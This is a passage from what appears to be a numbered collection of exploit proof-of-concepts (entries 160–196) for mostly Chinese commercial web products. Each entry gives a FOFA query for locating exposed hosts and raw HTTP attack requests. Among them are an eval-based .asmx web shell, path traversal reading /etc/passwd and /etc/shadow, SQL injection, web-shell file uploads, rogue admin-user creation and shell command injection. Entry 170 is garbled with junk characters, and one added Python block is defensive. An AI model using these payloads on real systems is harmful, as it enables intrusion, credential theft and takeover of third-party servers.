<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport 任意文件读取+ b# u1 `- L/ s/ y" _" O
FOFA:body="/general/sys/hjaxmanage.js"4 k& w( J' z8 {! k% U( E
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
' D4 w! u2 {5 _7 v6 yHost: balalanengliang
5 e }% K0 K; i+ z: V3 pUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 ?# d) m& H1 [! D K1 M% sContent-Type: application/x-www-form-urlencoded
; Y* M* O% Q" \9 a" }$ O2 y
) C3 z/ H2 L& \# r* |, b5 W/ r: b2 `filename=../webapps/ROOT/WEB-INF/web.xml2 Q5 d0 L$ H) ?* I: S9 t# J& c
- A: m& E5 W3 n8 ^8 v" U W! B9 N7 T% T% X" E8 R
171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA: body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license-plate recognition camera arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA: header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 library cluster management system (Interlib) updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA: server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA: title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 clinical browsing system deleteStudy SQL injection
FOFA: app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system): poihuoqu arbitrary file read
FOFA: title=="短视频矩阵营销系统"

POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

Note: the poi value is fetched as a URL, which is why the file:// scheme returns a local file; when checking your own instance, also try an http:// target you control, since a parameter that accepts file:// usually accepts other schemes as well. The request line says HTTP/2 as published; replay it as HTTP/1.1 if your tool only sends raw HTTP/1.x.

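Entries 188 and 190 are the same defect seen from two angles: a user-controlled name is turned into a filesystem path (or a URL that can name the filesystem) with no check that the result stays inside the intended directory. The Python below is an added example, not code from either product, showing the vulnerable join next to a layered check that rejects the exact PoC inputs above; ATTACHMENT_ROOT is an assumed storage root, not a path from either vendor.

```python
import os
import posixpath
from urllib.parse import unquote

# Assumed storage root for the example; the vendors' real paths are not known.
ATTACHMENT_ROOT = "/srv/app/attachments"


def resolve_vulnerable(root: str, requested: str) -> str:
    """The pattern behind entries 188 and 190: the parameter is joined to the
    storage root with no validation. os.path.join drops `root` entirely when
    `requested` is absolute, so file=/etc/passwd resolves to /etc/passwd, and
    '../' segments walk out of the directory."""
    return os.path.join(root, requested)


def resolve_safe(root: str, requested: str) -> str:
    """Return an absolute path guaranteed to sit under `root`, or raise ValueError.

    The checks are layered because each one alone has a bypass:
      1. one round of percent-decoding, so %2e%2e%2f is seen as ../ (a second
         round is deliberately not done: %252e stays a literal file name);
      2. reject NUL bytes and anything that looks like a URL scheme, which is
         how entry 190 reaches the filesystem (poi=file:///etc/passwd);
      3. reject absolute paths and any '..' segment lexically;
      4. resolve symlinks and confirm the final real path is still under root,
         which catches a symlink inside the upload directory pointing outside.
    """
    name = unquote(requested)
    if not name or "\x00" in name:
        raise ValueError("empty name or NUL byte")
    if "://" in name or name.lower().startswith("file:"):
        raise ValueError("URL scheme in filename")
    name = name.replace("\\", "/")
    if posixpath.isabs(name) or ".." in name.split("/"):
        raise ValueError("absolute path or traversal")
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, name))
    if os.path.commonpath([root_real, target]) != root_real:
        raise ValueError("path escapes storage root")
    return target


def is_accepted(requested: str, root: str = ATTACHMENT_ROOT) -> bool:
    """Convenience wrapper: True if resolve_safe would serve the file."""
    try:
        resolve_safe(root, requested)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # The two PoC inputs from entries 188 and 190 plus a few encoded variants.
    for probe in ["/etc/passwd", "../../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd",
                  "file:///etc/passwd", "report.pdf", "2024/06/minutes.docx"]:
        print(f"{probe:32} vulnerable -> {resolve_vulnerable(ATTACHMENT_ROOT, probe)}")
        print(f"{'':32} safe       -> {'served' if is_accepted(probe) else 'rejected'}")
```

The lexical '..' check and the realpath check are both kept on purpose: the first gives a clear rejection before any filesystem access, the second is the one that actually holds when the directory contains symlinks.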
191. 亿赛通电子文档安全管理系统 (electronic document security management system): NavigationAjax SQL injection
FOFA: body="/CDGServer3/index.jsp"

POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

Note: time-based blind injection in the id parameter (SQL Server, waitfor delay); a ~5 s delay confirms. Send the path exactly as shown, including the /js/../ segment, which is part of the published request.

192. 富通天下外贸ERP (foreign-trade ERP): UploadEmailAttr arbitrary file upload
FOFA: title="用户登录_富通天下外贸ERP"

POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;

// Harmless test handler, as in the published PoC: it only writes "test".
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    {
        get { return true; }
    }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

Note: the stored file's extension comes from the name query parameter and the raw request body becomes the file content, so an ASP.NET handler (.ashx) ends up on disk. The published PoC does not state where the file is stored.

193. 山石网科云鉴安全管理系统 (Hillstone 云鉴 host security management): setSystemTimeAction command execution
FOFA: body="山石云鉴主机安全管理系统"

Step 1: obtain a CSRF token for an arbitrary PHPSESSID.

GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2: call setSystemTimeAction.php with that token in token_csrf and the same PHPSESSID. The param value is evaluated as code (the PoC uses Python's os.system), so the command writes a marker file into a directory served by the web interface.

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3: read the marker back.

GET /master/img/config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0

Note: a response body of 23333333333456 confirms execution. Delete /opt/var/majorsec/installation/master/runtime/img/config afterwards so the marker is not left on a production host.

194. 飞企互联-FE企业运营管理平台 (FE enterprise operations platform): uploadAttachmentServlet arbitrary file upload
FOFA: app="FE-协作平台"
Quick check: a request to /servlet/uploadAttachmentServlet that gets a response rather than a 404 means the servlet is exposed.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

Note: the multipart filename is used as given, so the ../ sequences place hello.jsp inside the deployed fe.war; requesting hello.jsp under the application's web context should then return "hello".

195. 飞鱼星上网行为管理系统 (internet behavior management system): send_order.cgi command execution
FOFA: title=="飞鱼星企业级智能上网行为管理系统"

POST /send_order.cgi?parameter=operation HTTP/1.1
Host: your-ip
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

Note: the name value reaches a shell; the ; separators end the intended command and run uname -a. The body is JSON although the Content-Type says form-urlencoded; send it exactly as shown.

196. 河南省风速科技统一认证平台 (unified authentication platform): password reset
FOFA: body="/cas/themes/zbvc/js/jquery.min.js"

POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

